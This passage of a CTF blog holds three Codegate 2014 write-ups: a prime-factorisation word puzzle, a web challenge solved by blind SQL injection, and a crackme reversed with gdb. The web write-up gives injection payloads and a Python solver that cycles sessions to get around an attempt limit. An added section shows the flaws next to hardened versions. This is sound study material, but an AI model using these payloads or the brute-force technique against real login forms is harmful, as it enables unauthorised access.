 f.put(new BigInteger("249181")," r");
 f.put(new BigInteger("498331")," s");
 f.put(new BigInteger("996689")," t");
 f.put(new BigInteger("1993357")," u");
 f.put(new BigInteger("3986711")," v");
 f.put(new BigInteger("7973419")," w");
 f.put(new BigInteger("15946841")," x");
 f.put(new BigInteger("31893713")," y");
 f.put(new BigInteger("63787391")," z");

for (Map.Entry<BigInteger, String> entry : f.entrySet()) {
    // divide the prime out as often as possible; the count is its exponent
    int count = 0;
    while (a.mod(entry.getKey()).equals(BigInteger.ZERO)) {
        count++;
        a = a.divide(entry.getKey());
    }
    if (count != 0) {
        System.out.println(entry.getValue() + " " + count);
    }
}

}

After execution, we get:

u 7
l 3
e 2219
n 59
r 3889
m 971
g 13
f 2
i 487
h 127

At the moment we don’t know which position each letter belongs to, but we can assume that the letters are ordered by their exponents, starting with the smallest. So let’s sort the letters by exponent:

f 2
l 3
u 7
g 13
n 59
h 127
i 487
m 971
e 2219
r 3889

The resulting word is flugnhimer, which doesn’t seem to mean anything. But a letter can be used multiple times, so we should look at the exponents.

However, just typing flugnhimer into Google gives the result flugenheimer (NSFW), which was the flag.
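To make the factorisation step reusable, here is the same idea in Python. This is an added example and not part of the original write-up: it uses the prime table from the Java code above, adds a check that the number really consists of those primes only (a leftover cofactor means a prime the table does not know), and includes a small constructed encoder so the decoder can be tested without the huge number; the exponents used in the test are the ones recovered above, the function names are ours.

```python
from typing import Dict, Sequence, Tuple

# Prime-to-letter table as used in the write-up's Java code.
PRIME_ALPHABET: Dict[int, str] = {
    2: "a", 3: "b", 7: "c", 13: "d", 29: "e", 59: "f", 127: "g", 241: "h",
    487: "i", 971: "j", 1949: "k", 3889: "l", 7789: "m", 15569: "n",
    31139: "o", 62297: "p", 124577: "q", 249181: "r", 498331: "s",
    996689: "t", 1993357: "u", 3986711: "v", 7973419: "w", 15946841: "x",
    31893713: "y", 63787391: "z",
}
LETTER_PRIME = {letter: p for p, letter in PRIME_ALPHABET.items()}


def factor_over_alphabet(n: int) -> Tuple[Dict[str, int], int]:
    """Divide n by every alphabet prime as often as possible (the same loop as
    the Java code). Returns {letter: exponent} for the letters that occur and
    the cofactor that is left over; a cofactor other than 1 means n contains a
    prime the table does not know, so the decoding cannot be trusted."""
    exponents: Dict[str, int] = {}
    for p, letter in PRIME_ALPHABET.items():
        count = 0
        while n % p == 0:
            n //= p
            count += 1
        if count:
            exponents[letter] = count
    return exponents, n


def decode_word(n: int) -> str:
    """Letters ordered by exponent, smallest first, as the write-up assumes."""
    exponents, rest = factor_over_alphabet(n)
    if rest != 1:
        raise ValueError(f"leftover cofactor {rest}: not built from alphabet primes only")
    return "".join(letter for letter, _ in sorted(exponents.items(), key=lambda kv: kv[1]))


def encode_word(word: str, exponents: Sequence[int]) -> int:
    """Constructed inverse for testing: letter i becomes prime(letter)^exponents[i].
    One prime stands for one letter, so a repeated letter would merge its
    exponents into one and its positions could not be told apart; that is the
    limitation the write-up runs into with 'flugenheimer'."""
    if len(set(word)) != len(word):
        raise ValueError("this scheme cannot encode repeated letters")
    n = 1
    for letter, e in zip(word, exponents):
        n *= LETTER_PRIME[letter] ** e
    return n


if __name__ == "__main__":
    # exponents as recovered above; the number itself is our reconstruction
    n = encode_word("flugnhimer", [2, 3, 7, 13, 59, 127, 487, 971, 2219, 3889])
    print(decode_word(n))  # flugnhimer
```

The cofactor check is the part the Java loop lacks: if the challenge number had contained a prime outside the table, the Java version would have printed a plausible-looking word and silently dropped the rest.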

codegate 2014 Write-up: 120

February 28, 2014

The website for this challenge said “120 times left” and had only a password field and a submit button. Trying something random we get False as response; going back to the main page we see we now have “118 times left”, so each POST or GET to the page decreases the number by one.

The description also contained a link to the source code of index.php. The first thing we notice is that we can easily do a SQL injection:

if (eregi("replace|load|information|union|select|from|where|limit|offset|".
"order|by|ip|\.|#|-|/|\*",$_POST['password'])){
   @mysql_close($link);
   exit("Wrong access");
}

$query = "select * from rms_120_pw where (ip='$_SERVER[REMOTE_ADDR]') and
(password='$_POST[password]')";
$q = @mysql_query($query);
$res = @mysql_fetch_array($q);

if($res['ip']==$_SERVER['REMOTE_ADDR']){
   @mysql_close($link);
   exit("True");
}

else{
   @mysql_close($link);
   exit("False");
}

Using a single quote to escape the string, e.g. submitting ' or ''=' , will return True. A lot of useful keywords are filtered and we only have a boolean output, so we have to guess the password character by character with the like operator: ' or password like 'e%' or 1='

We can also see that if we used all our 120 attempts, a new password will be generated. The function RandomString() randomly selects 30 lowercase characters from the file smash.txt (an article from the magazine Phrack). So just guessing it seems quite unlikely, as we would have an average of only 4 guesses per character.

Still, we did a quick frequency analysis of the article to improve our odds by trying the most common letters first. However, as expected, even with a bit of luck (lots of e’s and t’s) we only get 15-20 characters at most. Looking back at the challenge description, the hover text states “You dont have enough arrows…”. So there must be a way to obtain more than 120 attempts!

This means back to the part with the session:

 if ($_SESSION['cnt'] > $max_times){
 unset($_SESSION['cnt']);
}

if ( !isset($_SESSION['cnt'])){
   $_SESSION['cnt']=0;
   $_SESSION['password']=RandomString();

   $query = "delete from rms_120_pw where ip='$_SERVER[REMOTE_ADDR]'";
   @mysql_query($query);

   $query = "insert into rms_120_pw values('$_SERVER[REMOTE_ADDR]',
'$_SESSION[password]')";
   @mysql_query($query);
}

$left_count = $max_times-$_SESSION['cnt'];
$_SESSION['cnt']++;

Looking closer we can see a fatal flaw in the approach used here: the IP and password are saved in the database, but the count (how many tries are left) is only tied to the PHP session ID. So if we first request a lot of sessions and then start brute-forcing, we can switch between sessions and start at “120 times left” again – with the same password still in the database! So basically we now have an arbitrary number of attempts :)

The last step was to go to auth.php and submit the current password to get the flag:
Congrats! the key is DontHeartMeBaby*$#@!

Our final code:

import requests

pw = ""
sessions = []
link = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"
# letters ordered by their frequency in smash.txt, most common first
chars = "etsoainrlcdxhfmpbuwgyvkjzq"

# request a handful of sessions up front: each one gets its own 120 attempts,
# while the password row in the database stays the same
for i in range(10):
    s = requests.session()
    s.get(link)
    sessions.append(s)

for s in sessions:
    count = 0

    # only start another pass over the alphabet if it still fits into this session's budget
    while count < 120 - 26:

        for c in chars:
            count += 1

            # boolean blind injection: True iff the password starts with pw + c
            query = "' or password like '" + pw + c + "%' or 1='"
            page = s.post(link, {'password': query})

            if page.text == "True":
                pw += c
                print(pw)
                break

        if len(pw) == 30:
            page = s.post(link + "auth.php", {'password': pw})
            print(page.text)
            exit()
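As an added illustration (neither the challenge’s code nor our solver), the following Python mirrors the two flaws in index.php with an in-memory SQLite table and puts the hardened variant next to each: a parameterised query instead of string concatenation plus a keyword blacklist, and an attempt counter stored in the same row as the password instead of in the PHP session. The table and the ip/password columns follow the page; the cnt column, the function names, the client IP and the passwords are constructed.

```python
import secrets
import sqlite3
import string

MAX_TIMES = 120  # the challenge's "120 times left"


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the challenge's rms_120_pw table. The table and
    its ip/password columns follow index.php; the cnt column is our addition
    for the hardened variant (constructed)."""
    db = sqlite3.connect(":memory:")
    db.execute("create table rms_120_pw (ip text primary key, password text, "
               "cnt integer not null default 0)")
    return db


def random_string(n: int = 30) -> str:
    """Stand-in for RandomString(): 30 lowercase letters (uniform, not drawn from smash.txt)."""
    return "".join(secrets.choice(string.ascii_lowercase) for _ in range(n))


def check_vulnerable(db: sqlite3.Connection, ip: str, password: str) -> bool:
    """Mirrors index.php: the request value is pasted into the SQL text, so a
    quote in 'password' rewrites the WHERE clause. The keyword blacklist does
    not help because "' or ''='" contains none of the filtered words."""
    query = f"select * from rms_120_pw where (ip='{ip}') and (password='{password}')"
    row = db.execute(query).fetchone()
    return row is not None and row[0] == ip


def check_safe(db: sqlite3.Connection, ip: str, password: str) -> bool:
    """Hardened form: bound parameters, so the input is only ever compared as a
    literal string and no blacklist is needed."""
    row = db.execute("select ip from rms_120_pw where ip=? and password=?",
                     (ip, password)).fetchone()
    return row is not None


def attempt_session_counted(db: sqlite3.Connection, session: dict, ip: str, guess: str) -> str:
    """Mirrors the session handling in index.php: the counter lives in the PHP
    session, the password lives in the table keyed by IP. Every new session
    brings its own 120 attempts while the row, and so the password, stays put."""
    if session.get("cnt", 0) > MAX_TIMES:
        del session["cnt"]
    if "cnt" not in session:
        session["cnt"] = 0
        session["password"] = random_string()
        db.execute("delete from rms_120_pw where ip=?", (ip,))
        db.execute("insert into rms_120_pw (ip, password) values (?, ?)",
                   (ip, session["password"]))
    session["cnt"] += 1
    return "True" if check_safe(db, ip, guess) else "False"


def attempt_db_counted(db: sqlite3.Connection, ip: str, guess: str) -> str:
    """Hardened form: the counter is stored in the same row as the password it
    protects, so attempts are counted no matter which session sends them, and
    the password is rotated once MAX_TIMES is reached."""
    row = db.execute("select cnt from rms_120_pw where ip=?", (ip,)).fetchone()
    if row is None or row[0] >= MAX_TIMES:
        db.execute("insert or replace into rms_120_pw values (?, ?, 0)",
                   (ip, random_string()))
    db.execute("update rms_120_pw set cnt = cnt + 1 where ip=?", (ip,))
    return "True" if check_safe(db, ip, guess) else "False"


def current_password(db: sqlite3.Connection, ip: str) -> str:
    return db.execute("select password from rms_120_pw where ip=?", (ip,)).fetchone()[0]


if __name__ == "__main__":
    ip = "203.0.113.5"  # constructed client address
    db = setup_db()
    db.execute("insert into rms_120_pw values (?, ?, 0)", (ip, "e3secret"))
    payload = "' or ''='"  # the payload from the write-up
    print("vulnerable:", check_vulnerable(db, ip, payload))  # True
    print("parameterised:", check_safe(db, ip, payload))     # False
```

The counter placement is the lesson that generalises: a limit that protects a secret has to be stored with that secret (or with the identity it belongs to), never in client-selectable state such as a session cookie.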

codegate 2014 Write-up: dodoCrackme

February 26, 2014

The first challenge of the codegate 2014 CTF was a reversing challenge. The Linux file command showed us:

 crackme_d079a0af0b01789c01d5755c885da4f6: ELF 64-bit LSB executable,
 x86-64, version 1 (SYSV), statically linked,
 BuildID[sha1]=0xb300ef9227a8911db0d6aea538fe03fe4dfb20fe, stripped

OK, it’s a 64-bit ELF binary, which means no “F5 in IDA”. Opening it with IDA64, an alert popped up that there are more than 1000 nodes to show. WTF? After raising the node limit, the graph showed a single, extremely huge function. After a quick look we noticed many syscalls and inc instructions and no imports at all. In short, the whole thing looked strange. As there were no strings in it, we gave it a try and executed the file:

 $~/codegate2014$./crackme_d079a0af0b01789c01d5755c885da4f6
 root@localhost's password: test
 Permission denied (password).

It seems the code prints strings that try to tell us it’s establishing an SSH connection to localhost, which is just a fake. If there are no strings in the binary, they must be generated at runtime. That would explain all those syscalls. So let’s run it within gdb and set a breakpoint in the first node with some syscalls.

 (gdb) b *0x400328
 Breakpoint 1 at 0x400328
 (gdb) r
 Starting program: ~/codegate2014/crackme_d079a0af0b01789c01d5755c885da4f6
 root@
 Breakpoint 1, 0x0000000000400328 in ?? ()

As expected, it really generates the strings char by char in the first syscall node. So the other node with syscalls must be the error message. All syscalls are called with rax = 1 and rdi = 1, which writes to stdout. But one syscall is called with rax = 0 and rdi = 0, which reads from stdin. Full information table here.

That should be the prompt asking for the root password. The code must check the input against something between the input syscall and the output syscall.

 00000000004065AE                 mov     eax, 0
 00000000004065B3                 mov     edi, 0
 00000000004065B8                 mov     rsi, rbp
 00000000004065BB                 mov     edx, 1
 00000000004065C0                 syscall
 00000000004065C2                 lea     rbp, [rbp-8]
 

So we set a breakpoint at 0x4065C2, directly after the read syscall. According to the system call table, rsi points to the buffer where the string is stored and rdx sets the read count. After restarting the program and hitting the breakpoint, we took a look at rsi:

 (gdb) x/20d $rsi
 0x7ffff7ff9b38: 116     0       0       0
 0x7ffff7ff9b48: 0       0       0       0
 0x7ffff7ff9b58: 72      0       0       0
 0x7ffff7ff9b68: 52      0       0       0
 0x7ffff7ff9b78: 80      0       0       0

116 is our first ‘t’, but hey, what’s that 72, 52, 80? After expanding the scope we get: 72, 52, 80, 80, 89, 95, 67, 48, 68, 69, 71, 97, 84, 69, 95, 50, 48, 49, 52, 95, 67, 85, 95, 49, 78, 95, 75, 48, 82, 69, 52. After converting these ASCII values to a string we get “H4PPY_C0DEGaTE_2014_CU_1N_K0RE4”, which is the flag, worth 200 points.
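Finding the single read among thousands of write syscalls is the kind of thing worth scripting rather than scrolling for. The following Python is an added example and not part of the original write-up: it walks an IDA-style listing, tracks the immediates moved into rax/rdi, and names each syscall using the Linux x86-64 numbers (0 = read, 1 = write, 60 = exit). The sample listing is constructed, except for the read block at 0x4065AE, which is the one shown above; the write and exit blocks and their addresses are made up, and the function names are ours.

```python
import re
from typing import Dict, List, Optional, Tuple

# Linux x86-64 syscall numbers for the calls seen in the write-up: rax selects
# the call, rdi carries the first argument (the file descriptor for read/write).
SYSCALL_NAMES = {0: "read", 1: "write", 60: "exit"}

# Writing a 32-bit register zero-extends into its 64-bit parent, so track both
# spellings under the 64-bit name.
REG_ALIAS = {"eax": "rax", "edi": "rdi", "esi": "rsi", "edx": "rdx"}

# "<address>  <mnemonic>  <operands>" as IDA prints it
LINE_RE = re.compile(r"^\s*([0-9A-Fa-f]+)\s+([A-Za-z]+)\s*(.*?)\s*$")


def parse_imm(text: str) -> Optional[int]:
    """Accept decimal ('0', '1') or IDA-style hex ('3Ch'); None for anything else."""
    text = text.strip()
    if re.fullmatch(r"[0-9][0-9A-Fa-f]*h", text):
        return int(text[:-1], 16)
    if re.fullmatch(r"[0-9]+", text):
        return int(text)
    return None


def classify_syscalls(listing: str) -> List[Tuple[int, str, Optional[int]]]:
    """Walk the listing top to bottom, remembering immediates moved into
    rax/rdi/rsi/rdx, and report (address, syscall name, fd) for every
    'syscall' instruction. Straight-line code between the movs and the
    syscall is assumed, which holds for the crackme's nodes; code with
    branches in between would need real data-flow analysis."""
    regs: Dict[str, Optional[int]] = {}
    found: List[Tuple[int, str, Optional[int]]] = []
    for line in listing.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        addr, mnem, ops = int(m.group(1), 16), m.group(2).lower(), m.group(3)
        if mnem in ("mov", "xor"):
            dst, _, src = (p.strip().lower() for p in ops.partition(","))
            dst = REG_ALIAS.get(dst, dst)
            src = REG_ALIAS.get(src, src)
            if mnem == "xor":
                # xor reg, reg is the usual idiom for zeroing a register
                regs[dst] = 0 if dst == src else None
            else:
                # a non-immediate source (e.g. rbp) means the value is no longer known
                regs[dst] = parse_imm(src)
        elif mnem == "syscall":
            num = regs.get("rax")
            name = "unknown" if num is None else SYSCALL_NAMES.get(num, f"syscall#{num}")
            found.append((addr, name, regs.get("rdi")))
    return found


def find_stdin_reads(listing: str) -> List[int]:
    """Addresses of syscalls that read from fd 0: where the prompt takes input."""
    return [addr for addr, name, fd in classify_syscalls(listing)
            if name == "read" and fd == 0]


# Constructed sample listing. Only the block 0x4065AE..0x4065C2 is copied from
# the write-up; the write block before it and the exit block after it,
# including their addresses, are made up to mimic the crackme's stdout writes.
SAMPLE_LISTING = """
0000000000400400                 mov     eax, 1
0000000000400405                 mov     edi, 1
000000000040040A                 mov     rsi, rbp
000000000040040D                 mov     edx, 1
0000000000400412                 syscall
00000000004065AE                 mov     eax, 0
00000000004065B3                 mov     edi, 0
00000000004065B8                 mov     rsi, rbp
00000000004065BB                 mov     edx, 1
00000000004065C0                 syscall
00000000004065C2                 lea     rbp, [rbp-8]
0000000000406F00                 mov     eax, 3Ch
0000000000406F05                 xor     edi, edi
0000000000406F07                 syscall
"""

if __name__ == "__main__":
    for addr, name, fd in classify_syscalls(SAMPLE_LISTING):
        print(f"{addr:#x}: {name} fd={fd}")
    print("stdin reads at", [hex(a) for a in find_stdin_reads(SAMPLE_LISTING)])
```

On the real binary one would feed this the text export of the function; the addresses it returns are exactly the ones to put a breakpoint on, as done above with 0x4065C2.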
